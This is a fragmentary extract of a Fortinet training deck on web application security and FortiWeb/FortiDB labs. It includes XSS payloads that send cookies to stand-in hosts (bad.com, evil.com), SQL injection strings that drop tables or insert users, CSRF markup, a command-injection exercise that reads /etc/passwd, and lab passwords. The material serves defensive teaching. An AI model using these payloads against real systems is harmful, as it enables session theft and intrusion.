AGENDA
Introduction to Web Application Security
Database Vulnerabilities & Misconfigurations
OWASP Top 10 and PCI-DSS
Lab Installation and Setup
Introduction to FortiWeb
How to PoC FortiWeb
FortiWeb Basic & Advanced Troubleshooting
Introduction to FortiDB
How to PoC FortiDB
FortiDB Basic & Advanced Troubleshooting
Web apps are written for efficient delivery of content; in most cases they are not developed with security in mind.
This leaves apps open to exploit and risks exposure of sensitive information. Attacks range from simple defacement to identity theft and the theft of credit card data and other PII.
POST method: submits data to be processed to the identified resource. Data is included in the message body.
POST /login.php?username=User1&password=pass1 HTTP/1.1
Client-side: the action occurs on the client side (browser); the instructions are executed on the user's computer.
SQL Injections
Injection attacks trick an application into including unintended commands in the data sent to an interpreter. Interpreters interpret strings as commands, e.g. SQL, LDAP, XPath.
Key Idea
Input data from the application is executed as code by the interpreter.
SQL Injections
1. App sends form to user
2. Attacker submits form with SQL exploit data (form field Pass: or 1=1--)
3. Application builds string with exploit data
4. Application sends SQL query to DB
5. DB executes query, including exploit, sends data back to application
6. Application returns data to user
(Path: Attacker / User -> Firewall -> Web Server -> DB Server)
Exploits of a Mom
Reflected XSS: the malicious content does not get stored on the server; the server bounces the original input back to the victim without modification. Consequences: steal cookies, hijack the user's session, unauthorized access (cookies sent to a collector such as www.badguy.com).
Stored XSS: the attacker uploads malicious scripting commands to a public forum; the server stores the malicious content and serves it in its original form to anyone who browses it.
Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie; </script>
Exponential growth: 7 hours, ~200 infected; 12 hours, ~10K infected
Some Reflections
Database Heist
RSA
Proprietary information about RSA's SecurID authentication tokens. (2011)
June 7, 2011 - RSA Faces Angry Users After Breach: The nation's biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Security's offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company.
HBGary Federal
60,000 confidential emails, executive social media accounts, and customer information. (2011)
2011-03-01 - The embattled CEO of HBGary Federal has resigned his post three weeks after Anonymous hacked into the company's network and stole thousands of e-mail messages.
Epsilon
E-mail databases from 2 percent of the firm's 2,500 corporate clients. (2011)
April 02, 2011 - Major Breach at Epsilon, the World's Largest Permission-Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow
Regulatory Environment
Cross-industry regulation: PCI, SOX
High-level requirements for databases: PID data access monitoring in databases; auditing financial database transactions to ensure integrity of financial statements
Vertical / Gov.      Regulation(s)
Finance              GLBA, Basel II
Healthcare           HIPAA
Pharma.              CFR part 11
States               CA law 1386
Federal              FISMA (NIST 800-53A)
Change Control
Keep track of all changes related to database structures (DDL) and users (DCL)
Virtualization
Support both virtualized and non-virtualized environments
A1 - Injections
A1 - Injections
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";
id="foo"                  produces  SELECT * FROM accnts WHERE ID='foo';
id="foo';DROP accnts;--"  produces  SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
CC=123456789  produces  <input name='cc' value='123456789'>
CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>  produces
<input name='cc' value='123456789"><script>window.location=http://evil.com?x=document.cookie</script>'>
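An added example, not from the deck: the <input> fragment above built with and without output encoding, then parsed the way a browser tokenises markup, to show what each version turns into; the payload string is constructed here in the shape the slide shows, using a single quote to break out of the single-quoted attribute.

```python
import html
from html.parser import HTMLParser

# Constructed payload with the shape shown on the slide, using a single quote
# to close the single-quoted value attribute of the <input>.
PAYLOAD = "123456789'><script>window.location='http://evil.com?x='+document.cookie</script>"


def render_unescaped(cc):
    # Mirrors the slide's concatenation: the parameter goes in unencoded.
    return "<input name='cc' type='TEXT' value='" + cc + "'>"


def render_escaped(cc):
    # html.escape(quote=True) encodes & < > " and ' as entities, so the value
    # can neither close the attribute nor start a new element.
    return "<input name='cc' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


class _TagCollector(HTMLParser):
    """Records start tags and the value attribute of every <input>, i.e. the
    element tree a browser would build from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def _parse(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p


def script_elements(markup):
    # Number of <script> elements the browser would execute from this markup.
    return _parse(markup).tags.count("script")


def first_input_value(markup):
    # The decoded value attribute of the first <input>, as the browser sees it.
    return _parse(markup).input_values[0]


if __name__ == "__main__":
    for label, fn in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        m = fn(PAYLOAD)
        print(label, "script elements:", script_elements(m), "| value:", first_input_value(m))
```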
A3 - Broken Authentication
Unpredictable passwords, session IDs and security questions
No session IDs or credentials in the URL
Avoid session fixation
Session timeouts and logout buttons
Different session IDs outside/inside TLS
No clear-text passwords
<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
<input type="hidden" name="sp" value="8109"/>
</form>
Patching
OS, application, frameworks / libraries
Keep track of sensitive data; passwords one-way hashed and salted; password/key management
TLS key passphrase; M2M passwords (obfuscation)
/user/getAccounts vs. /admin/getAccounts
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D (the percent-encoded form of www.google.com)
Sub-requirement 6.3
Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle.
6.3.1 Testing of all security patches
6.3.2 Separate development, test, and production environments
6.3.3 Separation of duties between development, test, and production
6.3.4 Live PANs are not used for testing or development
6.3.5 Removal of test data and accounts before production
6.3.6 Removal of custom application accounts, usernames, and passwords
6.3.7 Review of custom code prior to release to production or customers
Sub-requirement 6.5
Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.
6.5.1 Unvalidated input
6.5.2 Broken access control (for example, malicious use of user IDs)
6.5.3 Broken authentication and session management (use of account credentials and session cookies)
6.5.4 Cross-site scripting (XSS) attacks
6.5.5 Buffer overflows
6.5.6 Injection flaws (for example, structured query language (SQL) injection)
6.5.7 Improper error handling
6.5.8 Insecure storage
6.5.9 Denial of service
6.5.10 Insecure configuration management
Sub-requirement 6.6
Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
Installing an application layer firewall in front of web-facing applications
Lab Topology
VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB admin/fortidb1!$
HTTP_Server
DB_Server
Hard Disk: 20 Gb
Hyper Threading enabled
Lab Flows
One-Arm HTTP Proxy Topology: gives us enough flexibility for our labs.
VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB 4.2.1 admin/fortidb1!$
This flat network deployment is not recommended in a production environment, since a client can easily bypass FortiWeb.
index.html: redirect to index.php?p=login.html
show_profile.php: show customer information
save_profile.php: save changed customer information
topFrame.html: top frame
list_accounts.php: list the customer's associated accounts
list_activity.php: list account activity
index.php: frameset
login.html: login page
verify_admin.php: authenticate customer
list_cards.php: list the customer's associated cards
bottomFrame.html: bottom frame
show_transaction.php: show transfer information
save_transaction.php: make transfer
1. Create a new Virtual Server Object
2. Unique Object Name
3. Virtual IP address
4. Listening Interface
2. Unique Object Name
3. Default Action = Deny
4. Click OK to save
5. After saving click Create New
1. Hostname used by client
2. Accept HTTP traffic with hostname
3. Click OK to save
Final Results
2. Note the MAC addresses for the IP address of your FortiWeb and your Virtual IP. Are they the same? Why?
2. Ping www.xbank.com. Does it work?
3. Access www.xbank.com using your browser. Does it work? Why?
4. Add a new entry in your protected server to accept requests to www.xbank.com
Final Results
PWD: fortidb1!$
Monitoring xbankapp_db
1. Navigate to Targets
3. Save
4. Test Connection
5. Save
2. Select "Start monitoring when FortiDB starts" & click the Start Monitoring button
3. Save
Monitoring check
Introduction to FortiWeb
Network Firewall
FortiWeb
Web Application Firewall
Only Web Application Firewalls can detect and block application attacks!
Application Delivery
Assures availability and accelerates performance of critical web applications
FortiWeb Antivirus Service subscription automated content updates for file upload scanning
FortiWeb
Web Application Servers
Reverse Proxy
FortiWeb
High Availability
Active / Passive failover
Full configuration synchronization
Seamless fail-over
No down time
Configuration Sync
Sync FortiWeb devices across networks
Allows managing policies across multiple devices from a central location
Seamless integration into already existing HA/LB environments
FortiWeb
Server Farm
Disaster Recovery
FortiWeb-400C
FortiWeb-1000C
FortiWeb-3000C/3000CFsx
FortiWeb-4000C
FortiWeb-VM
Deploy FortiWeb in a virtualized environment
Mitigates blind spots
Protects web applications regardless of connection origin
Provides visibility into internal connections as well
Same functionality as the appliance
DMZ
Public Zone
Requirement
Licenses Hypervisor Memory CPU 10/100/1000 Interfaces Storage Capacity
Servers / DMZ
FortiAnalyzer Integration
Acceleration
Integrated ASIC-based hardware SSL offloading: offloads CPU-intensive SSL computing from the server to FortiWeb
Hardware-based key exchange and bulk encryption
Purpose-built SSL processing
Full certificate management
Advanced certificate verification and revocation capabilities
FortiWeb
Data Compression
Compresses poorly optimised content to minimise the impact on network resources and reduce application delivery latency
Allows efficient bandwidth utilization and response time to users by compressing data retrieved from servers
Compresses files using gzip
Compression rate depends on data type and character redundancy
FortiWeb
Load Balancing
Intelligent, application-aware layer 7 load balancing
Support for HTTP/HTTPS only
Variety of load balancing algorithms: Round Robin, Weighted Round Robin, Least Connection, HTTP Session Based Round Robin
Connection persistence, with a persistence timeout value
Absolute links
Any required content
Multiple content types supported
Enhanced/Basic Mode
Authentication options
Granular crawling capabilities
Scheduled and on-demand scanning
FortiWeb
Scan summary
Vulnerability by severity
Vulnerability by category
Application vulnerabilities
Common vulnerabilities
Crawling information
URLs accepting input
External links
Server Information
Email reports automatically
Updates via FortiGuard
Complements the WAF for PCI DSS 6.6
Slow-based and legitimate-request attacks
Using tools that can be easily downloaded from the internet such as HOIC and LOIC
Using botnets and automated tools to reach mass
Sometimes camouflaging real data breach attempts
SQL Injection primarily
Zombie Botnet Many become one
Malicious IPs: limits the number of TCP connections with the same session
HTTP Flood Prevention: limits the number of HTTP requests per second with the same session cookie
Limits the number of TCP connections, per second, to a specific URL before FortiWeb issues a script to the client to validate whether this is a real browser or an automated tool
WAF
Monitors application files at specified time intervals; upon detecting a file change, FortiWeb can alert or automatically restore the file
Protocol Validation
Validates HTTP RFC compliance
Event/Attack/Traffic Alerts
Attack Alerts
Full HTTP request; any access to web applications; any action on the FortiWeb device
Reports - Attacks
Out-of-the-box rich graphical reports
Custom reports
Scheduled daily, weekly, monthly or on demand
PDF, HTML, Word, TXT, MHT formats
Application Security
HTTP compliance, application signatures, Auto Learn
Accurate protection with multiple layers of defense
Integrated web vulnerability scanner
Protects against the OWASP Top 10
Application Delivery
Authentication, load balancing and acceleration, compression
Automated management using Auto Learn baselining
Easily deploys in any environment
Multiple deployment options
FortiClient Desktop
Accelerates applications
Application-aware load balancing, compression, ASIC-based SSL acceleration
Vulnerability Assessment
URL Rewriting
Without URL rewriting, when accessing the XBANK application the end user(s) are required to specify /xbank/ in the URL path, due to the existing directory structure. The URL Rewriting feature removes this requirement. Added benefit: it transparently hides the internal directory structure from end user(s).
1. Unique Rule Name
2. What to rewrite
3. Where to rewrite
4. Click OK to save
5. Click Create New to define the RegEx
A Note on Regular Expressions: matching URL paths against a regex provides a concise and flexible means for matching strings of text.
Metacharacters: [ ] ^ $ * ? | ( )
Specify the new URL path to be used to connect to the defined physical server. NOTE: $0 = the first RegEx parameter matched (everything inside the first set of parentheses).
3. Unique Policy Name
4. Click OK to save
5. Click Create New to select and prioritize Rewrite Rule(s)
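Added example (not FortiWeb's own code): a small rewriter that applies the $0-is-the-first-group convention stated above, together with an assumed two-rule policy for the XBANK lab that inserts the /xbank/ prefix so clients need not type it; the rules and the first-match-wins ordering are assumptions made for this illustration, not settings taken from the appliance.

```python
import re

_PLACEHOLDER = re.compile(r"\$(\d+)")


def rewrite_path(regex, replacement, path):
    """Apply one rewrite rule to a request path.

    Uses the numbering convention from the slide: $0 is the content of the
    FIRST parenthesised group (Python's group(1)), $1 the second, and so on.
    A path that does not match the rule's regex is returned unchanged.
    """
    m = re.search(regex, path)
    if m is None:
        return path

    def fill(ph):
        idx = int(ph.group(1)) + 1            # $0 -> group(1)
        if idx > len(m.groups()):
            raise ValueError(f"rule references ${idx - 1} but the regex has "
                             f"only {len(m.groups())} group(s)")
        return m.group(idx) or ""             # unmatched optional group -> empty

    return _PLACEHOLDER.sub(fill, replacement)


def apply_policy(rules, path):
    """A rewrite policy here is an ordered list of (regex, replacement) rules;
    the first rule whose regex matches is applied and the rest are skipped
    (assumed behaviour of prioritised rules, not verified against FortiWeb)."""
    for regex, replacement in rules:
        if re.search(regex, path):
            return rewrite_path(regex, replacement, path)
    return path


# Assumed rules for the XBANK lab (constructed for this example): rule 1 leaves
# paths that already carry the /xbank/ prefix alone, rule 2 inserts the prefix
# for everything else so the client-facing URL never needs it.
XBANK_RULES = [
    (r"^/xbank/(.*)$", "/xbank/$0"),
    (r"^/(.*)$", "/xbank/$0"),
]


def demo():
    return [apply_policy(XBANK_RULES, p) for p in
            ("/login.html", "/xbank/login.html", "/index.php?p=login.html", "/")]


if __name__ == "__main__":
    print(demo())
```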
Final Results
Information Disclosure
1. Usually one of the first steps taken by malicious users that will attack a system is gathering information about it: operating system, versions, application types, etc.
2. This gathering process is known as fingerprinting.
3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information.
Prevent Information Disclosure
1. Point your browser to http://www.xbank.com/xxx.html
2. What did you get as response? Any problem with it?
3. Sometimes applications give too much information when showing an error.
1. Name the Server Protection Policy: Server_Protection-xbank
2. Enable only the Information Disclosure rule
3. Select the Action of Alert & Erase
4. Click OK to save
Cross Site Scripting (XSS)
This is a type of attack in which malicious scripts are injected into trusted sites. Most of the time the reason a site is vulnerable to this type of attack is that it doesn't do appropriate parameter validation. It can be used to steal credentials, user and cookie information. It exploits the fact that the user trusts the site.
Cross Site Scripting (XSS) - An example (index.php): determining what parameter p is used for
This is just a simple example of XSS! You don't need to guess what happens when a malicious site is used instead of www.google.com.
1. Parameter Name: p
2. Max Length set to default value of 0
3. Select Required
4. Select Use Type Check
5. Select Argument Type = Regular Expression
6. Regular Expression = ^login.html$
7. Click OK to save
Final Result
1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection
2. Click OK to save
SQL Injection attack is about modifying SQL sentences by inserting special strings in application fields, URLs, hidden fields, etc.
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( 'mylogin', 'abc1234', 'John', 'Anderson')
SQL Injection - A look into verify_admin.php (2)
1. mssql_pconnect( ): connect to the DB server
SQL Injection - CHALLENGE: Login to the application. Try to login to the application without using any valid user or password. TIP: You'll have to inject some SQL.
from xbank_customer where customer_login = 'whatever you want' and customer_password = 'mypassword' or 'a'='a' ;
1. Edit Known Attacks Server_Protection-xbank
2. Enable ALL SQL Injection signatures
3. Select Alert & Deny as the action
4. Click OK to Save
5. Attempt a new SQL Injection
4. Assign the new Input Rule to the already applied Parameter Validation Rule
Command Injection
Command Injection Review: Command Injection is a type of attack that benefits from vulnerable applications to execute commands in the underlying operating system. It's a type of a more general category called Code Injection.
The exec( ) function executes an operating system command. In this case exec( ) is generating log entries for successful and failed logins and is using the variable $log.
4. You just copied the content of /etc/passwd to a file in the site's root directory, salida.txt
Command Injection - Executing commands (2)
5. Go to the HTTP Server (Linux) and see if the file /var/www/xbank/salida.txt
Command Injection - Executing commands (3)
6. Since we disabled the Parameter Validation rules we can use the browser to inspect the file
http://www.xbank.com/index.php?p=salida.txt
CSRF - Attacking www.xbank.com > Check balance: open your browser and go to www.xbank.com
CSRF - Attacking www.xbank.com > Run attack: search for the file csrf_page.html in the resources provided and double-click it
CSRF - Attacking www.xbank.com > See balance delta: check your balance again. Any change?
Prevent CSRF - Applying business logic: one way of preventing CSRF is enforcing the session to follow the application logic. For instance, to perform a withdrawal in www.xbank.com you should first go through:
1. verify_admin.php
2. do_transaction.php
3. save_transaction.php
The Page Access Rule functionality enforces business logic by means of a cookie, FORTIWAFSID
2. Create New
Prevent CSRF - Testing Configuration > Check Balance
1. Log back into www.xbank.com
2. Stay at the account listing page and review the balance
Prevent CSRF - Testing Configuration > Rerun attack
1. Log back into www.xbank.com
2. Stay at the account listing page and review the balance
3. Open your browser cookie viewer and search for the cookie FORTIWAFSID
4. Double-click csrf_page.html
Prevent CSRF - Testing Configuration > Verify no change: review your balance. Any change?
Brute Force Attacks
Login names and passwords always present a challenge in application security. Weak passwords are one of the most common attack vectors used to gain access to an application. Dictionary attacks or brute force login attacks consist of trying to guess a valid username and password combination. FortiWeb offers the possibility of preventing these attacks using statistical thresholds (similar to DoS sensors in FortiGate).
2. Create New
How does FWB determine that multiple connections originate from more than one computer?
Instead of only counting hits by source IP,
1. Name
Note: the page that should be monitored is verify_admin.php, but we are using login.html because it is easier to test with.
Configuring Brute Force Login Rule (3)
Apply the Brute Force Login rule to xbank_web_protection. Access http://www.xbank.com/login.html. Refresh your browser as fast as you can until you get banned for 10 seconds (F5, Command + R, etc.)
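An added example that is not part of the course material: a threshold detector replayed over constructed access-log lines, counting login-page hits per source IP and per session cookie (the two counters the DoS slides describe) and blocking a source for 10 seconds once the threshold is exceeded; the threshold, the window and the assumption that a blocked source is refused for every URL are choices made here, not FortiWeb's settings.

```python
from collections import defaultdict, deque


class LoginRateLimiter:
    """Threshold-based detector in the spirit of the brute-force login rule:
    count hits on the login page per source and block the source for a fixed
    period once it exceeds the threshold inside the window.

    Hits are counted both per source IP and per session cookie, so a burst
    from one session behind a shared IP and a burst from one IP across many
    sessions are each caught.
    """

    def __init__(self, page, max_hits, window_s, ban_s):
        self.page = page
        self.max_hits = max_hits
        self.window_s = window_s
        self.ban_s = ban_s
        self._hits = defaultdict(deque)   # key -> timestamps inside the window
        self._banned_until = {}           # key -> time the block expires

    def check(self, ts, src_ip, path, session_cookie=None):
        """Return 'allow', 'ban' (threshold just exceeded) or 'blocked'."""
        keys = [("ip", src_ip)]
        if session_cookie:
            keys.append(("cookie", session_cookie))
        # Assumption: a source under a period block is refused for every
        # request, not only for the monitored login page.
        for key in keys:
            until = self._banned_until.get(key)
            if until is not None and ts < until:
                return "blocked"
        if path != self.page:
            return "allow"
        for key in keys:
            q = self._hits[key]
            q.append(ts)
            while q and q[0] <= ts - self.window_s:
                q.popleft()                # drop hits that left the window
            if len(q) > self.max_hits:
                self._banned_until[key] = ts + self.ban_s
                q.clear()
                return "ban"
        return "allow"


# Constructed access-log lines: "<seconds> <src_ip> <method> <path> <session cookie>"
SAMPLE_LOG = """\
0.0 10.0.0.5 GET /login.html sid=A
0.1 10.0.0.5 GET /login.html sid=A
0.2 10.0.0.5 GET /login.html sid=A
0.3 10.0.0.5 GET /login.html sid=A
0.4 10.0.0.5 GET /login.html sid=A
0.5 10.0.0.5 GET /login.html sid=A
0.6 10.0.0.5 GET /login.html sid=A
3.0 10.0.0.7 GET /login.html sid=B
5.0 10.0.0.5 GET /index.html sid=A
11.0 10.0.0.5 GET /login.html sid=A
"""


def run_detector(log_text, page="/login.html", max_hits=5, window_s=1.0, ban_s=10.0):
    """Replay the log through the limiter; returns one decision per line."""
    limiter = LoginRateLimiter(page, max_hits, window_s, ban_s)
    decisions = []
    for line in log_text.splitlines():
        ts, ip, _method, path, cookie = line.split()
        decisions.append(limiter.check(float(ts), ip, path, cookie))
    return decisions


if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG.splitlines(), run_detector(SAMPLE_LOG)):
        print(f"{verdict:8} {line}")
```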
Auto-Learning
FortiWeb Deployment - Auto-Learning: any WAF deployment requires some knowledge of the application, which adds complexity to the deployment. Auto-Learning is a mode that can help during the deployment phase to create a baseline based on observed behavior.
Configuring Auto-Learning
1. Go to Auto Learn -> Auto Learn Profile -> Default Auto Learn Profile and create a new Inline Profile named xbank-auto
1. Go to Auto Learn -> Auto Learn Profile -> Auto Learn Profile
1. Name Profile
1. Go to Server Policy
2. Edit Xbank_web_policy
3. Click OK to save
Configuring Auto-Learning > Test WAF Auto Learn Profile
1. Access the XBANK site and navigate on it. Try to access every page, make transfers, update profile, etc.
2. Go to Auto Learn -> Auto Learn Report in the FortiWeb
3. Review the report automatically generated by the auto-learn feature
4. Download the report as PDF and review it
5. Note that it is possible to edit and adjust some of the results
6. Generate Configuration based on the Auto-Learn report
1. Generate Config
2. Name Profile
2. Click OK to save
Configuring Auto-Learning > Review generated configuration: pay special attention to the Parameter Validation rules
Web Defacement
Anti-Defacement Tool
Web Defacement: a website defacement is an attack on a website that changes the visual appearance of the site or a webpage.
FortiWeb Anti-Defacement Tool: FortiWeb has an Anti-Defacement tool that recognizes when a web site file has been changed and reacts accordingly.
1. Backs up and creates a hash for each of the site's objects
2. Monitors each object, comparing its hash with the one registered
3. If any change: alert and manually recover the changed file, or automatically recover the changed file
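An added example (not the FortiWeb tool itself) of the three steps above run on a constructed directory: back up and hash each object, re-hash and compare, and restore from the backup; the file names and contents are made up for the illustration.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def file_hash(path):
    # SHA-256 of the file contents, read in chunks so large objects are fine.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    # {relative posix path: sha256} for every file under root.
    root = Path(root)
    return {p.relative_to(root).as_posix(): file_hash(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def backup_site(site_dir, backup_dir):
    # Step 1: copy every object aside and register its hash as the baseline.
    shutil.copytree(site_dir, backup_dir, dirs_exist_ok=True)
    return snapshot(site_dir)


def detect_changes(site_dir, baseline):
    # Step 2: re-hash the live site and compare with the registered hashes.
    current = snapshot(site_dir)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "deleted": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def restore(site_dir, backup_dir, changes):
    # Step 3 (automatic recovery): put back modified and deleted objects from
    # the backup and remove objects that were not part of the baseline.
    site_dir, backup_dir = Path(site_dir), Path(backup_dir)
    for rel in changes["modified"] + changes["deleted"]:
        (site_dir / rel).parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(backup_dir / rel, site_dir / rel)
    for rel in changes["added"]:
        (site_dir / rel).unlink()


def demo():
    """Constructed XBANK-like site: back it up, alter it, detect, restore."""
    with tempfile.TemporaryDirectory() as tmp:
        site, backup = Path(tmp) / "xbank", Path(tmp) / "backup"
        (site / "img").mkdir(parents=True)
        (site / "index.html").write_text("<html>XBANK home</html>")
        (site / "login.html").write_text("<form>login</form>")
        (site / "img" / "logo.txt").write_text("logo bytes")
        baseline = backup_site(site, backup)

        # Simulated defacement: one page altered, one removed, one file dropped in.
        (site / "index.html").write_text("<h1>defaced</h1>")
        (site / "login.html").unlink()
        (site / "dropped.txt").write_text("unexpected object")

        before = detect_changes(site, baseline)
        restore(site, backup, before)
        after = detect_changes(site, baseline)
        return before, after


if __name__ == "__main__":
    print(demo())
```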
1. Go to Web Anti-Defacement
2. Create New
Name the policy for monitoring: go to Web Site with Anti-Defacement & Create New Policy
Configure Anti-Defacement Tool > Review: after a while, you should see a connected status and the number of files that were backed up
Configure Anti-Defacement Tool > Review (2): inspect the policy details and statistics
Configure Anti-Defacement Tool > Review (3): inspect the list of protected files and their attributes
3. Inspect changes by clicking on the Total Changed Files number
4. Access the XBANK site and you will see the defaced site
Configure Anti-Defacement Tool (8): review the log file and verify the defacement event
System Top
# diag system top
Shows process, process id, state, CPU consumption and memory consumption. If you press q it sorts by CPU or memory consumption.
Execute Options
# execute ?
Traceroute, when ping-options is modified, is also performed from the ping source. When a FortiGate or FortiWeb is registered, to avoid the FortiGuard registration wait time use: exec update-av, exec update-ips, exec update-now. Resetting the log disk requires a reboot.
Execute Ping
# execute ping
Execute Traceroute
# execute traceroute
Diagnose Commands
Crash Log
# diagnose debug crashlog read
Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.
Use this command to set the verbosity level of debug logs for autolearning.
Use this command to set the verbosity level of debug logs for SSL inspection (temporary decryption in order to enforce policies). SSL inspection is used only when FortiWeb is operating in a mode that supports it, such as true transparent mode, transparent inspection mode, or offline protection mode.
Use this command to set the verbosity level of debug logging for SSL/TLS offloading. SSL offloading is supported only when the FortiWeb appliance is operating in reverse proxy mode or true transparent proxy mode.
Use this command to set the verbosity level of debug logs for the HTTP protocol parser. This parser module dissects the HTTP headers and content body for analysis by other modules such as rewriting, HTTP protocol constraints, server information disclosure, and attack signature matching.
Diagnose Network
# diagnose network tcp list
# diagnose network arp add <interface_name> <interface_ipv4> <mac-address_hex>
# diagnose network arp delete <interface_name> <interface_ipv4> <mac-address_hex>
# diagnose network arp list
Use this command to add or delete an address resolution protocol (ARP) entry in the internal ARP table, or to display the ARP table.
Diagnose Policy
# diagnose policy dashboard {all | list <policy_name>}
# diagnose policy memory show <policy_name>
# diagnose policy pserver list <policy_name>
# diagnose policy session {count <policy_name> | list <policy_name>}
# diagnose policy traffic show <policy_name>
Use this command to view the process ID, memory usage, live sessions, and traffic statistics associated with a server policy.
Introduction to FortiDB
Introducing FortiDB
Native Audit
Selective audit, only 3-4% performance impact
Does not require agents
Captures 100% of events
Network Agents
2-3% performance impact on the server (not the DB)
Agents send information back to FortiDB appliances
FortiDB Family
FortiDB-400C
Targets SMB market with up to 10 Database servers
FortiDB-1000C
Scalable solution for up to 60 database servers
FortiDB-2000B
Enterprise deployment with redundant AC-power and support for up to 60 database servers
FortiDB Software
Database Servers
Support for both agent based, and agent less deployment with an additional sniffer-mode option
Providing a solution for every architecture
Out-of-the-box VA policies
Policy updates through FortiGuard Services
Mapping to CIS and PCI benchmarks
Risk levels
Remediation advice
Pentest module
FortiDB
Critical in establishing
Minimal privilege setting scheme Can be exported into reports
FortiDB
Admins usually do not understand how all these elements work together:
Which user accesses which database
What tables users access regularly
Where users come from and what tools they use (IP, source application, etc.)
What is normal behavior and what is suspicious
A profile/baseline must be created automatically, with constant updates, in order to understand the environment. Once the baseline is established it is easy to detect suspicious behavior.
FortiDB
Alerts Summary/Analysis
Alerts Summary: displays alert trends; timeframes are 7, 30, 90 days and 12 months; important for understanding trends
Alerts Analysis: primary focus is more detailed analysis; grouped by severity, policy, database action, and different client information; more granular view of trends
Reporting/ Compliance
Automated Compliance reports Reports with detailed drilldowns Integration with ArcSight Archive
FortiDB Summary
Multiple data collection methods: sniffer, native audit, agents
Out-of-the-box policies for privileged users and object/schema design changes
User, session and data policies allowing audit of every request
Real-time alerts
Pre-defined audit policies
Pre-defined compliance reports
Roles and privileges reports
Identifies vulnerabilities and provides remediation advice
Verifies configuration
Built-in best practices
User activity profiling
Vulnerability Assessment
Database Compliance
Compliance policies Compliance reports
Sensitive data discovery in databases Database Activity Monitoring with realtime alerts Vulnerability scanning with remediation advice User Activity Profiling for Baselining
1. Go to Assessments
2. Add
Database Vulnerability Assessment > Select Tests: select Assessment Tests (Policies)
Save
Database Vulnerability Assessment > Run Assessment: select (check box) & Run Assessment
Database Vulnerability Assessment > Review Results: select the Results tab and click on the Assessment Start Time to view the summary results for each target
Database Vulnerability Assessment > View Detailed Report: select the Target name to view the Vulnerability Assessment Detailed Report
Configuring Sensitive Data Discovery > Create New Policy: navigate to Policy > Data Discovery Policies and click Add to create a new Data Discovery Policy
Configuring Sensitive Data Discovery > Select Target: navigate to Vulnerability Assessment > Sensitive Data Discovery and select Target Name = xbankapp_db to select details and apply a Policy Group
Configuring Sensitive Data Discovery > Select DB Meta: select Target Details (Databases, Tables, Columns)
Configuring Sensitive Data Discovery > Run Discovery: select Target xbankapp_db and Start Scan; observe progress under the Last Discovery column
Configuring Sensitive Data Discovery > Discovery Results: after starting the Data Discovery, observe the results under the Last Discovery column and click the results link to view the Detailed Report
Configuring Sensitive Data Discovery > Preview Report: preview the report details
2. Add
1. Highlight database
2. Highlight tables to scan and use the arrow to mark them as selected
Configuring Sensitive Data Discovery (8)
1. Once the Sensitive Data Discovery is configured you can run it and wait until the scan finishes
2. After that, review the results and see if it found something
DAM Policies
2. Add a new Table Policy that generates an event when someone other than dbo reads or writes the dbo.spt_values table
3. Create a custom DAM Policy Group and add the created policy as a member
4. Assign the new Policy Group to the MSSQL monitor
5. Configure and start the monitor
6. Generate events
7. See results
2. Go to the Alerts pane
3. Select the recently created group. You shouldn't see any alert
SQL Injection
SQL Injection - Creating a new user: besides modifying the condition, we can benefit from the ; to actually create a new user in the database. Before showing how to create a new user by injecting code, let's configure FortiDB to alert when the application launches an INSERT. The XBANK application should NEVER execute an INSERT or DELETE in the xbank_customer table.
1. Name
2. Policies
3. Save
customer_password = 'a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad','1234') ; select * from xbank_customer where customer_login = 'a' ;
Login to the application using imbad as login name and 1234 as password. Voilà!
If something goes wrong, you will see details of the connection problem
Monitoring Check
System Resources
FortiDB Appliances have a System Resources option at the GUI
The System Resources section displays usage of the FortiDB unit's resources, including CPU, memory (RAM) and hard disk.
CPU Usage: the current status of CPU usage. This field displays CPU usage for core processes only; CPU usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded.
Memory Usage: the current status of memory usage. This field displays memory usage for core processes only; memory usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded.
Hard Disk Usage: the current status of hard disk usage. This field displays the amount of hard disk space used.
Execute Ping
The execute ping command allows you to send an ICMP echo request (ping) to test the network connection between the FortiDB system and another network device.
